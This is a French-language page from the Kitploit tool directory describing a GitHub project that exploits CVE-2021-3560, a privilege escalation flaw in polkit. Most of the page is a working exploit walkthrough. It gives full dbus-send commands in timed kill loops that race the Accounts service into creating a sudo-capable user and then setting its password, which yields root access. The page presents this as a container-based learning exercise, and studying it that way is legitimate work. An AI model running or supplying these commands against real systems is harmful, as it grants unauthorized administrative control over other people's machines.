Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-3560-Polkit-Privilege-Escalation | Kitploit
Outils/GitHubGitHub/markyu0401/cve-2021-3560-polkit-privilege-escalation
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubmarkyu0401/cve-2021-3560-polkit-privilege-escalation

CVE-2021-3560-Polkit-Privilege-Escalation

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
il y a 2 ansPas encore vérifié

CVE-2021-3560-Polkit-Privilege-Escalation

par Mark, Qingchen Yu Pour construire le conteneur avec

root@kitploit:~
docker build -t <image tag of your choice> .

Pour exécuter le conteneur

root@kitploit:~
docker run -it <image tag name>
  1. Commencez par start.sh

  2. Mesurer le temps d'exécution : Notez le temps « real » et calculez-en la moitié.

    root@kitploit:~
    time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1
    
  3. Créer un utilisateur avec les privilèges sudo : Remplacez X.XXX par la moitié du temps « real » ci-dessus, car nous voulons que le processus soit interrompu au milieu. La commande s'exécutera en boucle 10 000 fois. Vous devrez peut-être exécuter cette étape plusieurs fois.

    root@kitploit:~
    for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1 & sleep X.XXXs; kill $!;done
    
  4. Vérifier la création de l'utilisateur id samurai Il devrait afficher que l'utilisateur samurai existe et montrer ses permissions. Si ce n'est pas le cas, réexécutez l'étape 2.

  5. Générer le hash du mot de passe : dans ce cas, le mot de passe serait « iamsamurai » Notez le hash généré.

    root@kitploit:~
    openssl passwd -5 iamsamurai
    
  6. Définir le mot de passe du nouvel utilisateur : Remplacez X.XXX par la durée de sleep et Password Hash par le hash de l'étape 4. Remplacez UUUU par l'ID utilisateur de « samurai »

    root@kitploit:~
    for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/UserUUUU org.freedesktop.Accounts.User.SetPassword string:'Password Hash' string:GoldenEye & sleep X.XXXs; kill $!;done
    
  7. Passez au nouvel utilisateur avec le mot de passe que vous avez créé à l'étape 4. su - samurai

    Vous devriez maintenant pouvoir utiliser sudo avec cet utilisateur.

Télécharger l’outil